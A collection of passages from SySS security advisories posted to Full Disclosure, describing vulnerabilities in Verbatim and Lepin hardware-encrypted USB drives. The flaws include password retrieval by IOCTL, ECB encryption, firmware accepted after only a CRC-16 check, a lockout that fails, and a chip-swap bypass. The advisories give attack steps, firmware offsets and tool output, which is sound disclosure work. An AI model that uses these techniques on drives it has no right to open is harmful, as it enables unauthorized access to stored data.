Verbatim Executive Fingerprint Secure SSD, Matthias Deeg found out it uses an insecure design which allows retrieving the currently used password and thus the ability to unlock and access the stored data in an unauthorized way. The Verbatim Executive Fingerprint Secure SSD consists of the following five main parts: 1. An SSD in M.2 form factor 2. A USB-to-SATA bridge controller (INIC-3637EN) 3. An SPI flash memory chip (XT25F01D) containing the firmware of the INIC-3637EN 4. A fingerprint sensor 5. A fingerprint sensor controller (INIC-3782N) For encrypting the data stored on the SSD, the hardware AES engine of the INIC-3637EN is used. More specifically, AES-256 in ECB (Electronic Codebook) mode is used for data encryption, which is also a security issue by itself, as described in the SySS security advisory SYSS-2022-010[2]. The SSD can be either unlocked via the fingerprint sensor using a previously registered fingerprint or via a password. Unlocking the SSD via a password takes place using a Windows or macOS client software that sends specific IOCTL commands (IOCTL_SCSI_PASS_THROUGH) to the USB device. The data part of those device-specific commands is encrypted using AES with a hard-coded cryptographic key found within the client software and the USB-to-SATA bridge controller's firmware. One of the supported commands is able to retrieve the currently set password and cryptographic key material used for the data disk encryption. By sending this specific IOCTL command to the USB device and knowing the used AES encryption scheme for the command data, an attacker can instantly retrieve the correct password and thus unlock the device in order to gain unauthorized access to its stored data. Proof of Concept (PoC): For demonstrating the described security vulnerability, Matthias Deeg developed a software tool that can extract the currently set password of a Verbatim Executive Fingerprint Secure SSD. This enables an attacker to instantly unlock the device. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-02-03: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Executive Fingerprint Secure SSD https://www.verbatim-europe.co.uk/en/prod/executive-fingerprint-secure-ssd-usb-32-gen-1--usb-c-1tb-53657/ [2] SySS Security Advisory SYSS-2022-010 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-010.txt [3] SySS Security Advisory SYSS-2022-009 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-009.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vul
[FD] [SYSS-2022-014]: Verbatim Fingerprint Secure Portable Hard Drive - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28387)
Advisory ID: SYSS-2022-014 Product: Fingerprint Secure Portable Hard Drive Manufacturer: Verbatim Affected Version(s): #53650 Tested Version(s): #53650 Vulnerability Type:Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) Risk Level:High Solution Status: Open Manufacturer Notification: 2022-02-03 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28387 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Fingerprint Secure Portable Hard Drive is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The hard drive does not store passwords in the computer or system's volatile memory making it far more secure than software encryption."[1] Due to an insecure design, the Verbatim Fingerprint Secure Portable Hard Drive can be unlocked by an attacker who can thus gain unauthorized access to the stored data. Vulnerability Details: When analyzing the Verbatim Fingerprint Secure Portable Hard Drive, Matthias Deeg found out it uses an insecure design which allows retrieving the currently used password and thus the ability to unlock and access the stored data in an unauthorized way. The Verbatim Fingerprint Secure Portable Hard Drive consists of the following five main parts: 1. A hard drive (3.5 inch) 2. A USB-to-SATA bridge controller (INIC-3637EN) 3. An SPI flash memory chip (XT25F01B) containing the firmware of the INIC-3637EN 4. A fingerprint sensor 5. A fingerprint sensor controller (INIC-3782N) For encrypting the data stored on the hard drive, the hardware AES engine of the INIC-3637EN is used. More specifically, AES-256 in ECB (Electronic Codebook) mode is used for data encryption, which is also a security issue by itself, as described in the SySS security advisory SYSS-2022-015[2]. The hard drive can be either unlocked via the fingerprint sensor using a previously registered fingerprint or via a password. Unlocking the hard drive via a password takes place using a Windows or macOS client software that sends specific IOCTL commands (IOCTL_SCSI_PASS_THROUGH) to the USB device. The data part of those device-specific commands is encrypted using AES with a hard-coded cryptographic key found within the client software and the USB-to-SATA bridge controller's firmware. One of the supported commands is able to retrieve the currently set password and cryptographic key material used for the data disk encryption. By sending this specific IOCTL command to the USB device and knowing the used AES encryption scheme for the command data, an attacker can instantly retrieve the correct password and thus unlock the device in order to gain unauthorized access to its stored data. Proof of Concept (PoC): For demonstrating the described security vulnerability, Matthias Deeg developed a software tool that can extract the currently set password of a Verbatim Fingerprint Secure Portable Hard Drive. This enables an attacker to instantly unlock the device. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-02-03: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Fingerprint Secure Portable Hard Drive https://www.verbatim-europe.co.uk/en/prod/fingerprint-secure-portable-hard-drive-1tb-53650/ [2] SySS Security Advisory SYSS-2022-015 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-015.txt [3] SySS Security Advisory SYSS-2022-014 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-014.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: Thi
[FD] [SYSS-2022-016]: Verbatim Fingerprint Secure Portable Hard Drive - Missing Immutable Root of Trust in Hardware (CWE-1326) (CVE-2022-28383)
Advisory ID: SYSS-2022-016 Product: Fingerprint Secure Portable Hard Drive Manufacturer: Verbatim Affected Version(s): #53650 Tested Version(s): #53650 Vulnerability Type:Missing Immutable Root of Trust in Hardware (CWE-1326) Risk Level:Medium Solution Status: Open Manufacturer Notification: 2022-02-03 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28383 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Fingerprint Secure Portable Hard Drive is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The hard drive does not store passwords in the computer or system's volatile memory making it far more secure than software encryption."[1] Due to insufficient firmware validation, an attacker can store malicious firmware code for the USB-to-SATA bridge controller on the USB drive which gets executed. Vulnerability Details: When analyzing the Fingerprint Secure Portable Hard Drive, Matthias Deeg found out that the validation of the firmware for the USB-to-SATA bridge controller INIC-3637EN only consists of a simple CRC-16 check (XMODEM CRC-16). Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip (XT25F01B), which then gets successfully executed by the USB-to-SATA bridge controller. For instance, this security vulnerability could be exploited in a so-called "supply chain attack" when the device is still on its way to its legitimate user. An attacker with temporary physical access during the supply could program a modified firmware on the Verbatim Fingerprint Secure Portable Hard Drive, which always uses an attacker-controlled AES key for the data encryption, for example. If, later on, the attacker gains access to the used USB drive, he can simply decrypt all contained user data. Proof of Concept (PoC): SySS was able to read and write the SPI flash memory containing the firmware of the INIC-3637EN controller (128 KB) using a universal programmer. By analyzing the dumped memory content, SySS found out that the INIC-3637EN firmware is stored from the file offset 0x4000 to the file offset 0x1BFFB, and that the corresponding XMODEM CRC-16 is stored at the file offset 0x1FFFC. Matthias Deeg developed a simple Python tool for updating the checksum of modified firmware images before writing them to the SPI flash memory chip. The following output exemplarily shows updating a modified firmware image: $ python update-firmaware.py firmware_hacked.bin Verbatim Fingerprint Secure Portable Hard Drive Updater v0.1 - Matthias Deeg, SySS GmbH (c) 2022 [*] Computed CRC-16 (0x86DD) does not match stored CRC-16 (0x77FF). [*] Successfully updated firmware file Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-02-03: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Fingerprint Secure Portable Hard Drive https://www.verbatim-europe.co.uk/en/prod/fingerprint-secure-portable-hard-drive-1tb-53650/ [2] SySS Security Advisory SYSS-2022-016 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-016.txt [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provi
[FD] [SYSS-2022-004]: Verbatim Keypad Secure USB 3.2 Gen 1 Drive - Expected Behavior Violation (CWE-440) (CVE-2022-28386)
Advisory ID: SYSS-2022-004 Product: Keypad Secure USB 3.2 Gen 1 Drive Manufacturer: Verbatim Affected Version(s): Part Number #49428 Tested Version(s): Part Number #49428 Vulnerability Type:Expected Behavior Violation (CWE-440) Risk Level:Low Solution Status: Open Manufacturer Notification: 2022-01-27 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28386 Author of Advisory: Matthias Deeg (SySS GmbH) Overview: The Verbatim Keypad Secure is a USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for passcode input. The USB Drive does not store passwords in the computer or system's volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the device will lock and require re-formatting after 20 failed passcode attempts."[1] The security feature for locking and requiring to reformat the USB drive after 20 failed unlock attempts does not work as specified. Vulnerability Details: When analyzing the USB drive Verbatim Keypad Secure, Matthias Deeg found out that the device will not lock and require reformatting after 20 failed passcode attempts, as described in the product description[1] and the corresponding user manual[2]. Thus, an attacker with physical access to such a USB drive can try more passcodes in order to unlock the device. During the security analysis, SySS could not find out how many failed passcode attempts would actually lock the device and require reformatting it, as this device state was never reached. Additionally, trying to find out the correct passcode by either manually or automatically entering them via the provided keypad is rather insufficient compared to an equally possible offline brute-force attack described in SySS security advisory SYSS-2022-001[3]. Proof of Concept (PoC): SySS tried to unlock the Verbatim Keypad Secure USB drive with more than 20 consecutively entered wrong passcodes. Afterwards, contrary to the product description, the USB drive could still be successfully unlocked with the correct passcode, and access to the previously stored data was possible without any issues. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-01-27: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Keypad Secure https://www.verbatim-europe.co.uk/en/prod/verbatim-keypad-secure-usb-32-gen-1-drive-64gb-49428/# [2] Verbatim Keypad Secure USB Manual https://www.verbatim-marcom.com/image_Verbatim-49428_Keypad-Secure-USB-User-Manual_548705.pdf [3] SySS Security Advisory SYSS-2022-001 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-001.txt [4] SySS Security Advisory SYSS-2022-004 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-004.txt [5] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en OpenPGP_signature Description: OpenPGP digital signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinf
[FD] [SYSS-2022-008]: Verbatim Store 'n' Go Secure Portable HDD - Expected Behavior Violation (CWE-440) (CVE-2022-28386)
Advisory ID: SYSS-2022-008 Product: Store 'n' Go Secure Portable HDD Manufacturer: Verbatim Affected Version(s): GD25LK01-3637-C VER4.0 Tested Version(s): GD25LK01-3637-C VER4.0 Vulnerability Type:Expected Behavior Violation (CWE-440) Risk Level:Low Solution Status: Open Manufacturer Notification: 2022-01-31 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28386 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Store 'n' Go Secure Portable HDD is a portable USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for password input. The SSD does not store passwords in the computer or system's volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the SSD will lock and require re-formatting after 20 failed password attempts."[1] The security feature for locking and requiring to reformat the SSD after 20 failed unlock attempts does not work as specified. Vulnerability Details: When analyzing the external SSD Verbatim Store 'n' Go Secure Portable HDD, Matthias Deeg found out that the device will not lock and require reformatting after 20 failed passcode attempts, as described in the product description[1] and the corresponding user manual[2]. Thus, an attacker with physical access to such an external SSD can try more passcodes in order to unlock the device. During the security analysis, SySS could not find out how many failed passcode attempts would actually lock the device and require reformatting it, as this device state was never reached. Additionally, trying to find out the correct passcode by either manually or automatically entering them via the provided keypad is rather insufficient compared to an equally possible offline brute-force attack described in SySS security advisory SYSS-2022-005[3]. Proof of Concept (PoC): SySS tried to unlock the Verbatim Store 'n' Go Secure Portable HDD with more than 20 consecutively entered wrong passcodes. Afterwards, contrary to the product description, the external SSD could still be successfully unlocked with the correct passcode, and access to the previously stored data was possible without any issues. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-01-31: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Store 'n' Go Secure Portable HDD https://www.verbatim-europe.co.uk/en/prod/store-n-go-portable-ssd-with-keypad-access-256gb-53402/ [2] Verbatim Keypad Secure User Manual https://www.verbatim-marcom.com/image_Verbatim-53402_Verbatim-Keypad-Secure-User-Manual-English_422400.pdf [3] SySS Security Advisory SYSS-2022-005 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-005.txt [4] SySS Security Advisory SYSS-2022-008 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-008.txt [5] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en OpenPGP_signature Description: OpenPGP digital signature
[FD] [SYSS-2022-010]: Verbatim Executive Fingerprint Secure SSD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28382)
Advisory ID: SYSS-2022-010 Product: Executive Fingerprint Secure SSD Manufacturer: Verbatim Affected Version(s): GDMSFE01-INI3637-C VER1.1 Tested Version(s): GDMSFE01-INI3637-C VER1.1 Vulnerability Type:Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) Risk Level:Low Solution Status: Open Manufacturer Notification: 2022-02-03 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28382 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The SSD does not store passwords in the computer or system's volatile memory making it far more secure than software encryption."[1] Due to the use of an insecure encryption AES mode (Electronic Codebook), an attacker may be able to extract information even from encrypted data, for example by observing repeating byte patterns. Vulnerability Details: When analyzing the Verbatim Executive Fingerprint Secure SSD, Matthias Deeg found out that the firmware of the USB-to-SATA bridge controller INIC-3637EN uses AES-256 with the ECB (Electronic Codebook) mode. This operation mode of block ciphers like AES encrypts identical plaintext data, in this case blocks of 16 bytes, always to identical ciphertext data. For some data, for instance bitmap images, the lack of the cryptographic property called diffusion concerning the ECB mode can leak sensitive information even in encrypted data. One famous example for this is an ECB-encrypted image of the TUX penguin, which, for instance, is referenced in the Wikipedia article about block cipher modes of operation[2] to illustrate this issue. Thus, the use of the ECB operation mode can put the confidentiality of specific information at risk, even in an encrypted form. Additionally, in attack scenarios where an attacker has short-time physical access to a Verbatim Executive Fingerprint Secure SSD, and later returns it to its legitimate owner, the attacker may be able to compromise the integrity of the stored data by exploiting the fact that the same 16-byte plaintext blocks result in the same 16-byte ciphertext blocks, by replacing specific encrypted 16-byte blocks with other ones. Proof of Concept (PoC): The same 16 byte long plaintext pattern was written several times to an unlocked Verbatim Executive Fingerprint Secure SSD. When the SSD was then read using another SSD enclosure, the same 16 byte long ciphertext pattern could be observed for the corresponding plaintext data. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-02-03: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Executive Fingerprint Secure SSD https://www.verbatim-europe.co.uk/en/prod/executive-fingerprint-secure-ssd-usb-32-gen-1--usb-c-1tb-53657/ [2] Wikipedia article about block cipher mode of operation https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB) [3] SySS Security Advisory SYSS-2022-010 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-010.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in thi
[FD] [SYSS-2022-013]: Verbatim Executive Fingerprint Secure SSD - Insufficient Verification of Data Authenticity (CWE-345) (CVE-2022-28385)
Advisory ID: SYSS-2022-013 Product: Executive Fingerprint Secure SSD Manufacturer: Verbatim Affected Version(s): GDMSFE01-INI3637-C VER1.1 Tested Version(s): GDMSFE01-INI3637-C VER1.1 Vulnerability Type:Insufficient Verification of Data Authenticity (CWE-345) Risk Level:Low Solution Status: Open Manufacturer Notification: 2022-02-03 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28385 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The SSD does not store passwords in the computer or system's volatile memory making it far more secure than software encryption."[1] Due to missing integrity checks, an attacker can manipulate the content of the emulated CD-ROM drive containing the Windows and macOS client software. Vulnerability Details: When analyzing the Verbatim Executive Fingerprint Secure SSD, Matthias Deeg found out that the content of the emulated CD-ROM drive containing the Windows and macOS client software can be manipulated. The content of this emulated CD-ROM drive is stored as ISO-9660 image in the "hidden" sectors of the USB drive that can only be accessed using special IOCTL commands, or when installing the drive in an external disk enclosure. The following output exemplarily shows the content of the ISO-9660 file system: # mount hidden_sectors.bin /mnt/ # lsd -laR /mnt/ dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 . drwxr-xr-x root root 4.0 KB Fri Jan 7 16:39:47 2022 .. .r-xr-xr-x root root 70 B Wed Aug 14 09:20:40 2019 Autorun.inf dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 MAC dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 Windows /mnt/MAC: dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 . dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 .. dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 setup.app dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 Source /mnt/MAC/setup.app: dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 . dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 .. dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 Contents /mnt/MAC/setup.app/Contents: dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 . dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 .. dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 _CodeSignature .r-xr-xr-x root root 1.4 KB Thu Oct 24 06:58:18 2019 Info.plist dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 MacOS .r-xr-xr-x root root 8 B Thu Oct 24 06:58:18 2019 PkgInfo dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 Resources /mnt/MAC/setup.app/Contents/_CodeSignature: dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 . dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 .. .r-xr-xr-x root root 3.6 KB Thu Oct 24 07:06:02 2019 CodeResources /mnt/MAC/setup.app/Contents/MacOS: dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 . dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 .. .r-xr-xr-x root root 30 KB Thu Oct 24 07:06:02 2019 setup /mnt/MAC/setup.app/Contents/Resources: dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 . dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 .. dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 Base.lproj /mnt/MAC/setup.app/Contents/Resources/Base.lproj: dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 . dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 .. dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 Main.storyboardc /mnt/MAC/setup.app/Contents/Resources/Base.lproj/Main.storyboardc: dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 . dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 .. .r-xr-xr-x root root 445 B Thu Oct 24 06:58:18 2019 Info.plist .r-xr-xr-x root root 35 KB Thu Oct 24 06:58:18 2019 MainMenu.nib .r-xr-xr-x root root 3.5 KB Thu Oct 24 06:58:18 2019 NSWindowController-B8D-0N-5wS.nib .r-xr-xr-x root root 1.2 KB Thu Oct 24 06:58:18 2019 XfG-lQ-9wD-view-m2S-Jp-Qdl.nib /mnt/MAC/Source: dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 . dr-xr-xr-x root root 2.0 KB Wed Apr 1 09:29:50 2020 .. .r-xr-x
[FD] [SYSS-2022-024]: Lepin EP-KP001 - Violation of Secure Design Principles (CWE-657) (CVE-2022-29948)
Advisory ID: SYSS-2022-024 Product: EP-KP001 Manufacturer: Lepin Affected Version(s): KP001_V19 Tested Version(s): KP001_V19 Vulnerability Type:Violation of Secure Design Principles (CWE-657) Risk Level:High Solution Status: Open Manufacturer Notification: 2022-04-12 Solution Date: - Public Disclosure: 2022-06-10 CVE Reference: CVE-2022-29948 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Lepin EP-KP001 is a USB flash drive with AES-256 hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows (see [1]): "[Safeguard Your Sensitive DATA] With Military Grade Full-disk 256-bit AES XTS Hardware Encryption to protect your important files. All your data is protected by hardware encryption, so no one can access your data without knowing the password." Due to an insecure design, the Lepin EP-KP001 flash drive is vulnerable to an authentication bypass attack which enables an attacker to gain unauthorized access to the stored encrypted data. Vulnerability Details: When analyzing the USB flash drive Lepin EP-KP001, Matthias Deeg found out that it uses an insecure hardware design which allows an attacker to bypass the password-based user authentication. The Lepin EP-KP001 consists of the following four main parts: 1. An unknown NAND flash memory chip 2. An Alcor Micro flash disk controller (AU6989SNBL-GTD) 3. An unknown microcontroller (unkmarked chip) used as keypad controller 4. A high-speed analog switch (SGM7222) The encrypted disk partition with the stored user data can be unlocked by entering the correct passcode via the keypad and pressing the "unlock" button. Due to the performed analysis, the password-based user authentication via a passcode comprised of 6 to 14 digits is performed by the unknown microcontroller. By replacing this unknown microcontroller on a target device with one from an attacker-controlled Lepin EP-KP001 whose passcode was known, it was possible to successfully unlock the targeted Lepin EP-KP001 USB flash drive and to gain unauthorized access to the stored data in cleartext. Proof of Concept (PoC): A successful authentication bypass attack could be performed via the following steps: 1. Set a passcode on an attacker-controlled Lepin EP-KP001. 2. Desolder the unmarked microcontroller from the attacker-controlled device. 3. Desolder the unmarked microcontroller from the targeted Lepin EP-KP001. 4. Solder the unmarked microcontroller from the attacker-controlled device on the targeted device. 5. Unlock the targeted device with the initially set and known passcode. Solution: SySS is not aware of a security fix for the described security issue. Disclosure Timeline: 2022-04-12: Vulnerability reported to manufacturer 2022-06-10: Public release of security advisory References: [1] Product website for Lepin EP-KP001 https://www.amazon.com/Encrypted-Password-Aluminum-Portable-Protected/dp/B06W5H9GP7/ [2] SySS Security Advisory SYSS-2022-024 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-024.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en OpenPGP_signature Description: OpenPGP digital signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [SYSS-2022-043]: Verbatim Store 'n' Go Secure Portable SSD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28384)
Advisory ID: SYSS-2022-043 Product: Store 'n' Go Secure Portable SSD Manufacturer: Verbatim Affected Version(s): #53402 (GDMSLK02 C-INIC3637-V1.1) Tested Version(s): #53402 (GDMSLK02 C-INIC3637-V1.1) Vulnerability Type:Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) Risk Level:High Solution Status: Fixed Manufacturer Notification: 2022-06-29 Solution Date: 2022-07 Public Disclosure: 2022-10-07 CVE Reference: CVE-2022-28384 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Store 'n' Go Secure Portable SSD is a portable USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for password input. The hard drive does not store passwords in the computer or system’s volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the hard drive will lock and require re-formatting after 20 failed password attempts."[1] Due to an insecure design, the Verbatim Store 'n' Go Secure Portable SSD is vulnerable to an offline brute-force attack for finding out the correct passcode and thus gaining unauthorized access to the stored encrypted data. Vulnerability Details: When analyzing the external storage device Verbatim Store 'n' Go Secure Portable SSD, Matthias Deeg found out that it uses an insecure design which allows for offline brute-force attacks against the passcode. The device consists of the following four main parts: 1. An SSD with M.2 form factor 2. A USB-to-SATA bridge controller (INIC-3637EN) 3. An SPI flash memory chip (XT25F01D) containing the firmware of the INIC-3637EN 4. A keypad controller (unknown chip, marked "SW611 2201") For encrypting the data stored on the SSD, the hardware AES engine of the INIC-3637EN is used. More specifically, AES-256 in ECB (Electronic Codebook) mode is used for data encryption, which is also a security issue by itself described in SySS security advisory SYSS-2022-044[2]. The cryptographic key for the actual data encryption, the so-called data encryption key (DEK), is stored in a special sector of the SSD which in turn is encrypted using AES-256-ECB with a so-called key encryption key (KEK). This KEK is derived from the entered passcode which can be between five and twelve digits long, and generated by the keypad controller. When the unlock button is pressed on the Verbatim Store 'n' Go Secure Portable SSD, this generated AES 256-bit key is transmitted via SPI communication from the keypad controller to the USB-to-SATA bridge controller INIC-3637EN for configuring the corresponding hardware AES engine. For verifying the entered passcode, 